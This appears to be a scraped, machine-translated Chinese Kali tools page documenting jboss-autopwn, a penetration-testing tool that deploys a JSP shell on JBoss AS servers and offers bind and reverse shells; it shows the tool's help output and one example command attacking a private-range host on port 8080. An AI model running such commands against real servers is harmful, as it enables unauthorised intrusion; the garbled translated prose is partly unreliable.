<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>kali工具箱</title>
<script src="./static/bootstrap.min.js"></script>
<link rel="stylesheet" href="./static/main.css">
<link rel="stylesheet" href="./static/bootstrap.min.css">
<style type="text/css" id="syntaxhighlighteranchor"></style>
</head>
<main class="main-container ng-scope" ng-view="">
<div class="main receptacle post-view ng-scope">
<article class="entry ng-scope" ng-controller="EntryCtrl" ui-lightbox="">
<section class="entry-content ng-binding" ng-bind-html="postContentTrustedHtml">
<h2>的jboss-autopwn包装说明</h2><p style="text-align: justify;">这JBoss的脚本部署一个JSP壳目标的JBoss AS服务器上。一旦部署完成，该脚本用自己的上传和命令执行能力提供一个交互式会话。 </p><p>其特点包括： </p><ul><li>跨平台支持 - 在Windows，Linux和Mac目标测试</li><li>支持绑定和反向绑定弹</li><li> Meterpreter就会弹和Windows目标的VNC支持</li></ul><p>资料来源：https://github.com/SpiderLabs/jboss-autopwn <br> <a href="https://github.com/SpiderLabs/jboss-autopwn" variation="deepblue" target="blank">的jboss-autopwn首页</a> | <a href="http://git.kali.org/gitweb/?p=packages/jboss-autopwn.git;a=summary" variation="deepblue" target="blank">卡利的jboss-autopwn回购</a> </p><ul><li>作者：基督教G. Papathanasiou，Trustwave控股公司</li><li>许可：GPL第二版</li></ul><h3>包含在jboss-autopwn封装工具</h3><h5> JBoss的双赢 - 的JBoss的Windows autopwn </h5><code><a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="72001d1d063219131e1b">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="bdcfd2d2c9fdd6dcd1d4">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# jboss-win<br>
[!] JBoss Windows autopwn<br>
[!] Usage: ./e2.sh server port<br>
[!] Christian Papathanasiou <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="c4a7b4a5b4a5b0aca5aaa5b7adabb184b0b6b1b7b0b3a5b2a1eaa7aba9">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script><br>
[!] Trustwave SpiderLabs</code><h3> JBoss的Linux的 - JBoss的* nix的autopwn </h3><code><a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="1b6974746f5b707a7772">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# jboss-linux<br>
[!] JBoss *nix autopwn<br>
[!] Usage: ./e.sh server port<br>
[!] Christian Papathanasiou<br>
[!] Trustwave SpiderLabs</code><h3>的jboss-autopwn用法示例</h3><p>攻击指定的端口<b><i>（8080）</i></b>上的目标服务器<b><i>（192.168.1.200），</i></b>重定向标准错误<b><i>（2&gt;的/ dev / null的）：</i></b> </p><code><a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="e1938e8e95a18a808d88">[email&#160;protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script>:~# jboss-linux 192.168.1.200 8080 2&gt; /dev/null<br>
[x] Retrieving cookie<br>
[x] Now creating BSH script...<br>
[!] Cound not create BSH script..<br>
[x] Now deploying .war file:</code><div style="display:none">
<script src="//s11.cnzz.com/z_stat.php?id=1260038378&web_id=1260038378" language="JavaScript"></script>
</div>
</main></body></html>
